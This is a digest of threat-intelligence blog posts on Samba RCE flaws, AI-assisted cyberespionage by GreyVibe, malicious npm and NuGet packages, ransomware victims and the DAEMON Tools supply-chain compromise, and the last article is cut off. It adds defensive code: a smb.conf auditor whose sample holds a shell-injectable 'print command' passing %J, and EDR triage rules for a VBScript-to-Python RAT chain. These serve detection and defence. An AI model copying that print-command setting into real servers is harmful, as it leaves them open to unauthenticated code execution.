The Samba Team has released security patches to address several vulnerabilities, including two remote code execution (RCE) flaws with a maximum CVSS score of 10.0, affecting Samba enterprise file servers worldwide. These patches are important for safeguarding corporate data and preventing unauthenticated attackers from gaining full control of affected domains. Deploying the official vendor fixes is necessary to reduce these risks.

The two most severe vulnerabilities are:

- CVE-2026-4480: This flaw affects the printing subsystem across all previous Samba software versions.
  It arises when print servers use a specific command line substitution option: Samba passes client-controlled job description strings to the 'print command' setting via the '%J' substitution character without escaping shell metacharacters. This oversight enables guest users to execute arbitrary scripts on the host without any prior authentication, directly compromising the system.
- CVE-2026-4408: This vulnerability exposes the platform's core password verification mechanism in classic domain controllers that run a non-standard background process as a system service. The system processes client-supplied usernames within an internal check script without filtering input tokens. Malicious actors can exploit this raw string handling to gain system privileges remotely, making it a serious threat to the integrity of domain controllers.

These security updates also address several high-severity issues:

- CVE-2026-1933: This flaw stems from missing authorization checks during file reparse point processing, allowing users to convert normal files into functional symbolic links on read-only network shares, which can circumvent access controls.
- CVE-2026-3012: This flaw poses risks during automatic certificate enrollment routines. Domain members are observed fetching certificate chains over unencrypted HTTP channels instead of secure LDAP links, enabling local attackers to intercept cleartext traffic and install malicious root certificates.
- CVE-2026-3238: An unauthenticated denial of service (DoS) vulnerability allows an attacker to send a corrupted UDP packet that triggers a null pointer dereference, causing the Active Directory WINS server component to crash instantly.
- CVE-2026-2340: Found within the immutable storage module, this flaw permits local users to overwrite protected files by manipulating file rename functions, compromising data integrity.
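An added configuration audit for the CVE-2026-4480 pattern (not code from the article or from the Samba project): it parses an smb.conf and flags every share whose 'print command' substitutes the client-controlled job name via %J, which is the setting an administrator would review before applying the workaround of removing that substitution. The smb.conf text is constructed; the parser's treatment of parameter names as case- and whitespace-insensitive follows Samba's documented smb.conf rules and is stated here as an assumption.

```python
"""Audit smb.conf for 'print command' values that pass the job name via %J.

Added example, not from the article or the Samba project. The configuration
below is constructed. Samba ignores case and whitespace in parameter names
(assumed here from the smb.conf documentation), so 'Print Command' and
'printcommand' are treated as the same key.
"""
import re

SAMPLE_SMB_CONF = """\
[global]
   workgroup = CORP
   printing = bsd
   printcap name = /etc/printcap

[printers]
   comment = All Printers
   path = /var/spool/samba
   printable = yes
   guest ok = yes
   ; the client-supplied job name (%J) ends up on a shell command line
   print command = lpr -P %p -J "%J" %s ; rm %s

[archive-printer]
   path = /var/spool/samba
   printable = yes
   print command = lpr -P %p %s ; rm %s
"""

_SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")


def parse_smb_conf(text):
    """Return {section: {normalised_param: value}} for an smb.conf string.

    Comment lines start with ';' or '#'; a ';' inside a value is not a comment.
    Parameter names are lower-cased with whitespace removed (see module note).
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        m = _SECTION_RE.match(line)
        if m:
            current = m.group(1).strip().lower()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current][re.sub(r"\s+", "", key).lower()] = value.strip()
    return sections


def find_job_name_print_commands(text):
    """List (section, print command) pairs in which %J reaches the command line.

    Only the upper-case %J (job name) is the client-controlled string the
    article describes; lower-case %j is the job number and is not flagged.
    """
    hits = []
    for section, params in parse_smb_conf(text).items():
        cmd = params.get("printcommand")
        if cmd and "%J" in cmd:
            hits.append((section, cmd))
    return hits


if __name__ == "__main__":
    for section, cmd in find_job_name_print_commands(SAMPLE_SMB_CONF):
        print(f"[{section}] print command = {cmd}")
```

Only the [printers] share is reported; the archive-printer share uses the spool file (%s) and printer name (%p) but never the job name, so it does not carry this pattern.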
To eliminate these Samba vulnerabilities, administrators must upgrade their deployments to versions 4.22.10, 4.23.8, or 4.24.3. Manual workarounds, such as removing specific characters from print configuration files, can be applied if immediate patching is not feasible.

### How is the GreyVibe threat group using AI in its cyberespionage campaigns?

The GreyVibe threat group, a likely Russian-speaking entity, is using AI tools, including ChatGPT, Ideogram AI, and Google Gemini, to generate highly realistic lures and custom malware for its cyberespionage campaigns. Active since at least August 2025, the group primarily targets Ukrainian and Ukraine-related organizations across military, government, civilian, and business sectors. This use of AI allows GreyVibe to craft diverse attack chains, increasing its success rate.

GreyVibe's use of AI is evident in the quality and variety of its social engineering tactics, which include:

- PhantomMail: Spear-phishing emails delivering malicious ZIP/RAR archives via Google Drive and 4sync links. These emails use decoy PDFs or fake error messages while deploying malware, and impersonate Ukrainian government, emergency, telecom, and energy entities.
- PhantomClick: Fake CAPTCHA/ClickFix pages disguised as Zoom and LAPAS sites, tricking victims into executing self-infecting commands through deceptive Cloudflare verification prompts.
- PrincessClub: Fake Ukrainian adult/dating websites that deliver FallSpy Android spyware and PhantomRelay/LegionRelay Windows malware. Operators behind these sites use fake female Telegram personas and have incorporated WebRTC-based live calls to capture victim audio/video.
- DroneLink: Counterfeit Ukrainian military charity websites themed around FPV drones and UAVs, sharing infrastructure and tooling with the PrincessClub campaigns.
- Nebo: Fake "СПО НЕБО" Russian military communications login pages, designed to mislead Ukrainian military personnel into believing they are accessing a legitimate Russian military terminal.

The group's custom malware, including the obfuscators LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, as well as the LegionRelay PowerShell-based Remote Access Trojan (RAT), was likely developed with AI assistance. LegionRelay enables file theft, screenshot capture, browser credential theft, Telegram and WhatsApp data exfiltration, and RDP access setup. Another RAT, PhantomRelay, supports system fingerprinting, dynamic script loading, and PowerShell/Windows command execution. The FallSpy Android spyware deployed in the PrincessClub and Nebo campaigns collects intelligence such as contact lists, call logs, device information, location data, media files, and SIM information.

Despite this sophistication, WithSecure researchers note that GreyVibe exhibits inconsistencies not typical of mature nation-state actors, such as uploading development samples to public scanning platforms and deploying cryptocurrency miners on some victim machines. This suggests a hybrid nature, potentially involving current or former cybercriminal actors absorbed into, or working independently under, state-directed tasking, and aligns with trends in Russia-linked cyber campaigns. For more information on such activities, refer to PurpleOps' analysis of malware campaigns by Russian hackers.

### What new supply chain attacks target developer ecosystems with malicious packages?

Recent cybersecurity research shows a surge in software supply chain attacks, with malicious packages actively infiltrating both the NuGet and npm registries to steal banking credentials and cloud secrets from developers. These campaigns demonstrate threat actors' sophistication beyond simple typosquatting, using manufactured legitimacy to compromise development workflows.
One incident involves a malicious NuGet package named "Sicoob.Sdk" (versions 2.0.0 through 2.0.4), which masqueraded as a C# software development kit for Sicoob, one of Brazil's largest cooperative financial systems. This package was designed to exfiltrate sensitive information, including client IDs, PFX certificates (used for authenticating businesses with the Sicoob banking network), and raw Boleto API responses. The package, downloaded nearly 500 times, was even surfaced by Google Search AI Mode as a legitimate library, increasing its reach to unsuspecting developers. The profile behind the package, "sicoob," also listed 11 other NuGet packages with approximately 6,000 collective downloads.

The Microsoft Defender Security Research Team identified 14 malicious npm packages published by a single threat actor, "vpmdhaj" (a39155771@gmail.com), on May 28, 2026. These packages typosquatted well-known OpenSearch, ElasticSearch, DevOps, and environment-configuration libraries. Their primary goal was to harvest sensitive data such as AWS credentials, HashiCorp Vault tokens, npm tokens, and CI/CD pipeline secrets from compromised host environments through a purpose-built credential harvester launched via a preinstall hook. Examples of these packages include "@vpmdhaj/devops-tools" and "app-config-utility".

These specific attacks are part of a broader trend of supply chain compromises that has seen other campaigns emerge:

- 164 malicious npm packages across five scoped namespaces, featuring a postinstall payload that downloads and executes second-stage JavaScript, exfiltrating victim environment variables.
- 141 malicious npm packages published between May 7 and 27, 2026, which abuse npm as free static hosting for an ad-monetized web proxy, serving popunder ads to those accessing the pages.
- A malicious npm package called "forge-jsxy," assessed as a continuation of the "forge-jsx" campaign, capable of keylogging, clipboard monitoring, .env scanning, shell history exfiltration, host inventory, remote filesystem access, screenshot capture, and cryptocurrency wallet scanning.
- 176 malicious npm packages employing dependency confusion by using high version numbers (99.99.99) to distribute a postinstall script that fingerprints the host, downloads platform-specific JavaScript payloads, conducts reconnaissance, exfiltrates credentials and developer secrets, and runs second-stage binaries.

The threat actor TeamPCP (also known as Replicating Marauder and UNC6780) has been identified as a key actor in these supply chain attacks, poisoning popular developer tooling across npm, PyPI, Docker Hub, and Packagist in a worm-like fashion. Its tactics involve exploiting automation and inherited trust within CI/CD workflows to push compromises further downstream, enabling victim-to-victim expansion. This reflects a shift in which attackers design plausible, operationally routine package names to blend into modern software ecosystems, which makes detection challenging.

### Technical Takeaways

- Three Windows zero-day vulnerabilities (CVE-2026-33825, CVE-2026-41091, CVE-2026-45498) affecting Microsoft Defender and BitLocker are under active exploitation following uncoordinated public disclosure by Chaotic Eclipse.
- Samba has released patches for two Remote Code Execution vulnerabilities (CVE-2026-4480, CVE-2026-4408) with CVSS 10.0 scores, along with several high-severity access control and DoS flaws, requiring updates to versions 4.22.10, 4.23.8, or 4.24.3.
- The GreyVibe threat group, a likely Russian-linked entity, is using AI tools such as ChatGPT and Google Gemini to create spear-phishing lures and custom malware (e.g., LegionRelay, FallSpy) targeting Ukrainian organizations.
- Ongoing software supply chain attacks involve malicious NuGet (Sicoob.Sdk, ~500 downloads) and npm (14 packages from vpmdhaj) packages, designed to steal banking credentials, PFX certificates, AWS credentials, and CI/CD pipeline secrets from developers.
- Threat actors are increasingly using "manufactured legitimacy" in package naming and exploiting automated CI/CD workflows to cause widespread compromise in developer ecosystems, as seen with groups like TeamPCP.

---

## Everest Ransomware Targets Healthcare, Utilities (7 Victims)

- URL: https://purple-ops.io/blog/everest-ransomware-healthcare-utilities
- Date: 2026-05-28
- Category: Ransomware Report
- Tags: everest-ransomware, ransomware, healthcare-cybersecurity, critical-infrastructure
- Reading time: 5 min

**Summary:** Everest ransomware remains the most active threat, targeting healthcare and utility sectors with 7 recent victims, driving current attack trends.

### Statistical Overview

Victim Totals

- This month: 720
- This quarter: 1498
- Year to date: 4123
- Last 24h: 31

Quarterly Breakdown

- Q1: 2631 | Q2: 1498 | Q3: 0 | Q4: 0

Ransomware activity shows a significant count for Q1, with Q2 maintaining consistent but lower activity. This indicates persistent threat actor operations across diverse sectors. The current period's observed victim count of 31 reflects ongoing, targeted ransomware campaigns.

### Introduction

Recent ransomware activity saw 31 new victims across various sectors. Groups like Everest (7 victims), Qilin (5 victims), Akira (4 victims), and DragonForce (4 victims) were the primary drivers. The United States remains the most targeted country. Industries such as healthcare, manufacturing, construction, hospitality, and legal services were affected. This period shows diverse threats with varied TTPs and an ongoing shift towards data exfiltration-focused extortion.
### Ransomware Summary Table

| # | Group | Victims (24h) | Sample Victims | Geos | Sectors |
|---|---|---|---|---|---|
| 1 | Everest | 7 | Advanced psychiatry associates, Akm, L&p aesthetics (+4) | Netherlands, Kuwait | Energy & Utilities, Healthcare |
| 2 | Qilin | 5 | Mainstreet organization of realtors, Otthon centrum, Roofing solutions (+2) | United States, United Kingdom | Construction & Engineering, Hospitality & Travel |
| 3 | Akira | 4 | Alpine aerotech, General doors, Gs yuasa lithium power (+1) | Germany, United States | Manufacturing, Retail & Ecommerce |
| 4 | DragonForce | 4 | Ksmart.ca, Northbridge.com, President container group (+1) | United States, United Kingdom | Construction & Engineering, Manufacturing |
| 5 | Krybit | 2 | Motofrenos.com, Smile-siam.com | Thailand, Colombia | Manufacturing |
| 6 | Medusa Locker | 2 | Mairie thiverval grignon demo, Sitgroup | France, Italy | Manufacturing, Government / Public Sector |
| 7 | Nova (RALord) | 2 | Casasafer, My english house academy | Spain, Italy | Hospitality & Travel, Education |
| 8 | 3AM | 1 | Amc.org.au | Australia | Education |
| 9 | CMD | 1 | Hospice Savannah | United States | Healthcare |
| 10 | Chaos | 1 | Sterlingindustries.com | Canada | Manufacturing |
| 11 | INC Ransom | 1 | lawants | Spain | Legal |
| 12 | LockBit | 1 | gu | Brazil | Legal |

Everest was the most active group, targeting the healthcare and energy sectors, including "Advanced psychiatry associates" and "L&p aesthetics." Qilin and Akira also showed significant activity across construction, hospitality, and manufacturing. Victims included "Hospice Savannah" by CMD ransomware, which shows continued threats to the healthcare sector, and "Mairie thiverval grignon demo" by Medusa Locker, impacting a government entity. For more details on DragonForce's activities in real estate and healthcare, refer to our analysis on DragonForce Ransomware Targeting.
### Victim Distribution

By Country

- United States: 11
- Germany: 3
- Canada: 3
- Spain: 2
- United Kingdom: 2
- Italy: 2
- Thailand: 1
- Australia: 1
- Netherlands: 1
- Kuwait: 1

By Industry

- Medical Practices: 2
- Real Estate: 2
- Manufacturing: 2
- Hospitality: 2
- Construction: 2
- Legal Services: 2
- Education: 1
- Venture Capital and Private Equity: 1
- Packaging and Containers Manufacturing: 1
- Oil and Gas Data Analytics: 1

The United States continues to see the most ransomware attacks, with broad distribution across several industries; none significantly dominates. This suggests less concentrated sector-specific campaigns and more opportunistic or diverse targeting by various ransomware operators, consistent with previous observations of groups like Qilin and DragonForce, as shown in our recent ransomware victim updates.

### Ransomware News

**Topline:** The current period shows changes in cyber extortion, with a continued shift from data encryption to pure data exfiltration and diverse, sophisticated attack methods.

**Campaigns & Operations:**

- Silent Ransom Group operatives are increasingly engaging in in-person cyber extortion, physically appearing at victim offices to facilitate intrusions, often targeting law firms.
- The ShinyHunters gang, also known as Bling Libra, confirmed a social-engineering data breach affecting nearly 6 million Carnival Cruise customers, exfiltrating PII.
- Latin American cybercriminal groups are aggressively shifting towards exfiltrating government databases, with incidents like La Pampa Leaks affecting Uruguay's identity service and Chronus Group targeting Mexican government agencies.
- A ransomware incident at Wohnungsgenossenschaft Neukölln in Germany encrypted core property-management and financial systems, disrupting tenant services.

**Vulnerabilities & TTPs:**

- An analysis of Akira ransomware kill chains reveals initial access via brute-forcing forgotten local SSLVPN accounts lacking MFA. This is followed by lateral movement via RDP, credential access, and defense evasion, including security log clearance and shadow copy deletion.
- The broader cyber extortion economy shows a pivot, with extortion-only campaigns rising as threat actors use SaaS abuse, supply-chain compromises, and rapid data exfiltration, frequently bypassing traditional encryption.
- The FBI also warns about physical intrusion tactics by Silent Ransom Group, using methods like USB insertion or pressuring staff into remote sessions, often exfiltrating data via legitimate utilities like WinSCP or Rclone without encryption.

**Analyst Note:** These developments show the increasing sophistication and diversification of threat actor methods, from physical intrusions to advanced data exfiltration. This requires defensive strategies across both digital and physical security domains.

### Technical Takeaways

- Implement Phishing-Resistant MFA: Crucial for all remote access points (e.g., SSLVPN) and administrator accounts to mitigate brute-force and credential stuffing attacks.
- Enhance Data Exfiltration Detection: Deploy end-to-end Data Loss Prevention (DLP) across cloud, endpoint, and network environments to detect rapid data theft, especially given the pivot away from encryption.
- Strengthen Network Segmentation and Backup Integrity: Rigorous network segmentation limits lateral movement, while immutable offline backups ensure recovery capability even if primary systems are compromised.
- Correlate Perimeter and Endpoint Logs: Integrate and analyze logs from firewalls (e.g., SSLVPN syslog) and endpoint events (e.g., Windows EVTX) with synchronized NTP to reconstruct full kill chains and identify anomalous activity.
- Prepare for Physical Intrusion Vectors: Develop and rehearse incident response plans that account for in-person social engineering tactics, including policies for unidentified individuals and unauthorized device connections.
--- ## DAEMON Tools CVE-2026-8398 Supply Chain (CVSS 9.3) - URL: https://purple-ops.io/blog/daemon-tools-cve-2026-8398-supply - Date: 2026-05-28 - Category: CVE Analysis - Tags: daemon-tools, cve-2026-8398, supply-chain-attack, rat, trojan - Reading time: 5 min | CVSS: 9.3 **Summary:** DAEMON Tools supply chain compromise (CVE-2026-8398, CVSS 9.3) involved trojanized binaries signed with a legitimate certificate. DAEMON Tools CVE-2026-8398 Supply Chain (CVSS 9.3) AVB Disc Soft, the vendor of DAEMON Tools software, recently experienced a supply chain compromise, identified as CVE-2026-8398. This vulnerability, with a CVSS v4 score of 9.3, is a severe threat caused by unauthorized tampering with legitimate software binaries. The software supply chain's integrity was directly impacted, leading to the distribution of trojanized installers. Threat actors gained illicit access to AVB Disc Soft's build or distribution infrastructure. This access allowed them to inject malicious code into three DAEMON Tools binaries: DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe. These poisoned files were then digitally signed with the legitimate AVB Disc Soft code-signing certificate, making them appear authentic and helping them evade standard signature-based detection mechanisms. CVE-2026-8398 is included in the CISA Known Exploited Vulnerabilities (KEV) Catalog, which shows its widespread impact. This designation confirms active exploitation and mandates urgent remediation for Federal Civilian Executive Branch (FCEB) agencies. Its inclusion in the KEV Catalog means this compromise poses an immediate and serious risk to any organization or individual using the affected DAEMON Tools versions. What is CVE-2026-8398 and why is it critical? CVE-2026-8398 identifies a severe supply chain vulnerability in DAEMON Tools software, with a CVSS v4 score of 9.3, caused by the compromise of the vendor's build and distribution infrastructure. 
The issue is critical because a supply chain attack abuses trust: seemingly legitimate software delivers malicious payloads, bypassing typical security controls meant to validate software authenticity. Threat actors gained unauthorized access to AVB Disc Soft's development or distribution environment. This allowed them to modify the official DAEMON Tools software packages, injecting malicious code into DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe. Distributing these trojanized binaries, which kept their legitimate digital signatures from AVB Disc Soft, created a deceptive infection method. Users installing these compromised versions unknowingly introduced malware into their environments. The high CVSS score reflects the broad impact, ease of exploitation, and serious consequences for confidentiality, integrity, and availability.

### Impact

An attacker exploiting CVE-2026-8398 can achieve extensive system compromise, including reconnaissance, persistent remote access, and data exfiltration. The primary risk is the deployment of a modular Python-based Remote Access Trojan (RAT). This RAT can fingerprint the host system and establish a persistent command-and-control (C2) channel, including mapping Active Directory environments. This access allows adversaries to encrypt stolen data and await further operator commands, enabling various post-exploitation activities.

Such a compromise has severe consequences. Organizations face risks of major data breaches, intellectual property loss, and extensive network disruption. Individual users may experience credential theft, surveillance, and their systems could be used in larger botnets or attack infrastructure. Because the attack exploited the supply chain, any entity that installed DAEMON Tools software during the compromise period is a potential victim, regardless of their internal security.
The malicious software arrived appearing legitimate, so the trust placed in signed software was used against users, creating a major challenge for detection and response.

### Exploitation Chain

The CVE-2026-8398 exploitation chain begins with a compromise of the software vendor's infrastructure, not a direct attack on end-users. Threat actors first gained unauthorized access to AVB Disc Soft's build or distribution environment. This important step allowed them to manipulate the software before it reached users.

Once inside, the attackers trojanized three DAEMON Tools binaries: DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe. They injected malicious code into these executables, making them tools for malware delivery. The deceptive aspect of this attack is that these trojanized files were then digitally signed with AVB Disc Soft's legitimate code-signing certificate. This digital signature made the malicious installers appear trustworthy to operating systems and many endpoint security solutions, allowing them to bypass typical signature-based detections and security prompts. As discussed in our analysis of supply chain attacks involving poisoned software, using legitimate signing certificates is a recurring tactic that reduces trust and makes detection difficult.

When a user downloads and executes these compromised DAEMON Tools installers, a multi-stage infection process begins. The malicious code within the trojanized binaries first deploys a VBScript loader. This loader acts as an initial access point, fetching and executing the primary payload. The ultimate payload is a modular Python-based Remote Access Trojan (RAT). This RAT is designed for stealth and persistence. It performs reconnaissance by fingerprinting the infected host and mapping the Active Directory environment if present.
It then establishes a persistent command-and-control (C2) communication channel, encrypting any stolen data before exfiltrating it and awaiting further instructions from the attackers. This approach ensures covert operation and sustained access to the compromised system.

### Affected Products and Versions

The CVE-2026-8398 vulnerability impacts DAEMON Tools software because a supply chain compromise affected its official binaries. The core components identified as trojanized are:

- DTHelper.exe
- DiscSoftBusServiceLite.exe
- DTShellHlp.exe

Research indicates that attackers gained unauthorized access to the vendor's build or distribution infrastructure and then tampered with these executables. This means any version of DAEMON Tools software distributed from the compromised infrastructure during the attack period, which included these trojanized binaries, is affected. While precise version numbers are not detailed in available intelligence, users should consider any installation of DAEMON Tools software that occurred after the infrastructure compromise and before clean versions were released or the certificate was revoked as potentially affected. The compromise relates to the integrity of the distributed software package rather than a flaw within the software's code.

### Detection

Detecting the CVE-2026-8398 compromise requires a multi-layered approach. This approach focuses on identifying anomalous behavior instead of relying solely on signature-based detection of the legitimately signed, trojanized binaries. Analysts and engineers should implement full monitoring strategies.

**Endpoint Detection and Response (EDR) Queries:**

- Monitor for VBScript files (.vbs) executing from the DAEMON Tools installation path or directories where legitimate installers extract temporary files. Unusual VBScript activity, especially that which initiates PowerShell or Python processes, is suspicious.
- Look for unexpected execution of Python interpreter binaries (e.g., python.exe, pythonw.exe) from non-standard locations, especially if associated with DAEMON Tools processes or after installation, as this indicates RAT execution.
- Identify processes spawned by DTHelper.exe, DiscSoftBusServiceLite.exe, or DTShellHlp.exe that are not typical for disc imaging software, such as network connections to suspicious external IPs, file writes to unusual directories, or process injection attempts.
- Search for newly created files or modifications in system directories related to persistence mechanisms (e.g., registry run keys, startup folders) initiated by DAEMON Tools components or directly by Python processes.
- Monitor for attempts to enumerate Active Directory (AD) information or perform host fingerprinting activities originating from Python processes. This could involve queries to AD services or collection of detailed system configuration data.

**Network Indicators:**

- Analyze network logs for outgoing C2 communications from systems running DAEMON Tools software to unusual or unknown IP addresses and domains. The Python RAT encrypts stolen data before transmission, so look for abnormal data volumes or unusual protocols to external endpoints.
- Monitor for DNS requests to newly observed or suspicious domains made by processes related to DAEMON Tools or Python.
- Implement network segmentation to limit lateral movement capabilities of a compromised host.

**Log Signatures and System Artifacts:**

- Review Windows Event Logs for security events related to certificate validation failures. Although legitimate signing complicates this initially, post-revocation, any attempt to execute these binaries should trigger alerts if OCSP/CRL checks are enforced.
- Examine file system timestamps and attributes for anomalies in the DAEMON Tools installation directory. Unexpectedly recent modifications to core executables, or additional, unrecognized files, could indicate tampering.
- Check for the presence of the specific trojanized binary hashes. While the initial legitimate signing might bypass basic checks, if the original clean hashes are known, any deviation indicates compromise.
- Use threat intelligence feeds for Indicators of Compromise (IOCs) associated with the modular Python RAT, including C2 domains, IP addresses, and specific file hashes.

**Code-Signing Certificate Monitoring:**

- Ensure real-time Online Certificate Status Protocol (OCSP) or Certificate Revocation List (CRL) checks are enforced at execution time for all signed executables. This is important for detecting when the compromised certificate has been revoked. Without real-time checks, revocation provides limited protection.

Proactive detection requires continuous vigilance, integrating EDR telemetry with network and log analysis to identify subtle deviations that show a supply chain compromise like CVE-2026-8398.

### Remediation

Remediating the CVE-2026-8398 supply chain compromise requires immediate and complete action to contain, eradicate, and prevent future infections. Given the nature of a trojanized installer signed with a legitimate certificate, standard patching alone may not suffice without forensic validation.

**Patch and Reinstall Clean Versions:**

- Obtain and deploy the latest, verified clean versions of DAEMON Tools software directly from the official vendor website, ensuring no intermediary downloads are used. This assumes AVB Disc Soft has remediated its infrastructure and is distributing untampered binaries.
- Before reinstalling, all existing installations of DAEMON Tools deployed during the suspected compromise window must be completely uninstalled and their directories cleaned to ensure no lingering malicious components remain.
- If available, deploy vendor-provided tools or instructions for verifying the integrity of the installed software and system post-remediation.
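As an added triage aid, not code from purple-ops.io or AVB Disc Soft, the following Python applies the EDR heuristics from the Detection section above to constructed Sysmon-style process-creation events (the DAEMON Tools component, the VBScript loader, and the out-of-place Python interpreter), so a responder can check a host's telemetry before declaring a reinstall clean; the trusted Python directories and the clean-hash values are assumptions and placeholders.

```python
"""Triage process telemetry for the CVE-2026-8398 VBScript-loader-to-Python-RAT chain.
Added example, not code from purple-ops.io or AVB Disc Soft; the event layout mimics
Sysmon Event ID 1 / EDR process-creation records, and every path, hash and event
below is constructed for illustration."""
import re
from dataclasses import dataclass

# Components the article names as trojanized (matched case-insensitively).
DAEMON_BINARIES = {"dthelper.exe", "discsoftbusservicelite.exe", "dtshellhlp.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
STAGE2_HOSTS = {"powershell.exe", "pwsh.exe", "python.exe", "pythonw.exe"}
PYTHON_IMAGES = {"python.exe", "pythonw.exe"}
# Directories where a Python interpreter is expected on a workstation
# (assumption; tune to the organisation's software baseline).
TRUSTED_PYTHON_DIRS = (
    r"c:\\program files\\python",
    r"c:\\users\\[^\\]+\\appdata\\local\\programs\\python",
)
# Placeholders standing in for vendor-published clean hashes (constructed).
KNOWN_GOOD_SHA256 = {
    "dthelper.exe": "CLEAN-HASH-PLACEHOLDER-DTHELPER",
    "discsoftbusservicelite.exe": "CLEAN-HASH-PLACEHOLDER-BUSSERVICE",
    "dtshellhlp.exe": "CLEAN-HASH-PLACEHOLDER-SHELLHLP",
}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str        # full path of the created process
    cmdline: str
    sha256: str = ""  # image hash when the sensor records one


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def python_in_trusted_dir(image):
    low = image.lower()
    return any(re.match(pat, low) for pat in TRUSTED_PYTHON_DIRS)


def descends_from_daemon(event, by_pid, max_depth=8):
    """Walk the parent chain to see whether a DAEMON Tools component is an ancestor."""
    cur = by_pid.get(event.ppid)
    for _ in range(max_depth):
        if cur is None:
            return False
        if basename(cur.image) in DAEMON_BINARIES:
            return True
        cur = by_pid.get(cur.ppid)
    return False


def triage(events):
    """Return (rule_id, pid) findings for the behaviours the Detection section lists."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = basename(e.image)
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        cmd = e.cmdline.lower()
        # R1: a DAEMON Tools component spawning a script host or interpreter,
        #     which is atypical for disc-imaging software.
        if pimg in DAEMON_BINARIES and img in SCRIPT_HOSTS | STAGE2_HOSTS:
            findings.append(("R1-daemon-spawns-interpreter", e.pid))
        # R2: a .vbs run from the DAEMON Tools tree or an installer temp directory.
        if img in SCRIPT_HOSTS and ".vbs" in cmd and ("daemon tools" in cmd or "\\temp\\" in cmd):
            findings.append(("R2-vbs-loader", e.pid))
        # R3: the VBScript loader handing off to PowerShell or Python.
        if pimg in SCRIPT_HOSTS and img in STAGE2_HOSTS:
            findings.append(("R3-vbs-spawns-stage2", e.pid))
        # R4: Python interpreter outside any standard install; higher confidence
        #     when a DAEMON Tools process is an ancestor.
        if img in PYTHON_IMAGES and not python_in_trusted_dir(e.image):
            rule = "R4-python-nonstandard-path"
            if descends_from_daemon(e, by_pid):
                rule += "-under-daemon"
            findings.append((rule, e.pid))
        # R5: a named component whose hash deviates from the known-clean value.
        if img in KNOWN_GOOD_SHA256 and e.sha256 and e.sha256 != KNOWN_GOOD_SHA256[img]:
            findings.append(("R5-hash-mismatch", e.pid))
    return findings


# Constructed sample telemetry: a tampered DTHelper.exe launches a .vbs from a temp
# directory, which starts a pythonw.exe dropped outside any standard Python install;
# a benign build script started from cmd.exe is included for contrast.
SAMPLE_EVENTS = [
    ProcEvent(1, 0, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(50, 1, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(100, 1, r"C:\Program Files\DAEMON Tools Lite\DTHelper.exe",
              "DTHelper.exe", sha256="CONSTRUCTED-TAMPERED-HASH"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Local\Temp\DTL_setup\update.vbs"'),
    ProcEvent(300, 200, r"C:\Users\alice\AppData\Local\Temp\svc\pythonw.exe",
              "pythonw.exe agent.pyc"),
    ProcEvent(400, 50, r"C:\Program Files\Python312\python.exe", "python.exe build.py"),
]
```

Running `triage(SAMPLE_EVENTS)` yields five findings for pids 100, 200 and 300 and none for the benign pid 400.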
**System Isolation and Forensic Analysis:**

- Immediately isolate all systems suspected of having installed the trojanized DAEMON Tools software. This prevents lateral movement and further data exfiltration.
- Conduct a complete forensic analysis on all potentially compromised systems. This should include memory forensics, disk image analysis, and network traffic review to identify the complete extent of the infection, any data exfiltrated, and potential persistence mechanisms established by the Python RAT.
- Identify and remove all components of the Python RAT, including loaders, configuration files, and any modifications to the system (e.g., scheduled tasks, registry entries, new user accounts) that provide persistence or privilege escalation.

**Certificate Revocation and Reissuance:**

- The compromised code-signing certificate (registered under Xiamen Lunwei Huage Network Co.(Sectigo), Ltd.) used to sign the malicious binaries has been revoked. Organizations should verify that their systems enforce OCSP or CRL checks to honor this revocation and prevent future execution of old, compromised binaries.
- AVB Disc Soft must work with the Certificate Authority to revoke any other potentially compromised certificates and issue new ones for future software releases. Organizations should be prepared to update their trust stores accordingly.

**Enhanced Supply Chain Security:**

- Implement and enforce Software Bill of Materials (SBOM) practices to maintain an inventory of all components, dependencies, and their origins within applications.
- Establish strict third-party software validation procedures, including independent security audits and integrity checks for all software consumed by the organization.
- Consider implementing application whitelisting solutions that restrict software execution to only approved binaries, preventing unauthorized code from running, even if signed.
- Strengthen developer and build environment security, including multi-factor authentication, least privilege access, and continuous monitoring for anomalous activities within infrastructure related to software development and distribution.

**Account and Credential Review:**

- Assume that any credentials on compromised systems may have been exfiltrated. Force a password reset for all user accounts and service accounts that had access to affected machines.
- Review and rotate API keys and other secrets stored on or accessible from compromised systems.

### Technical Takeaways

- CVE-2026-8398 is a supply chain compromise impacting DAEMON Tools software (CVSS v4: 9.3).
- Attackers gained access to AVB Disc Soft's infrastructure, trojanizing DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe.
- The malicious binaries were digitally signed with a legitimate certificate, enabling them to bypass signature-based endpoint detection.
- Exploitation leads to the deployment of a modular Python-based Remote Access Trojan (RAT) for reconnaissance, Active Directory mapping, and command-and-control (C2).
- The incident shows the urgent need for strong supply chain security practices and real-time validation of software integrity, beyond just digital signatures.

---

## AI Exploit Development Speeds to 0.5 Days

- URL: https://purple-ops.io/blog/ai-exploit-development-speeds
- Date: 2026-05-28
- Category: Threat Intelligence
- Tags: ai, exploit-development, vulnerability-management, threat-intelligence, cve
- Reading time: 5 min

**Summary:** AI accelerates exploit development to 0.5 days, creating critical visibility gaps for security teams struggling with traditional detection methods.

Research by Cogent Research shows exploit development has accelerated due to artificial intelligence.
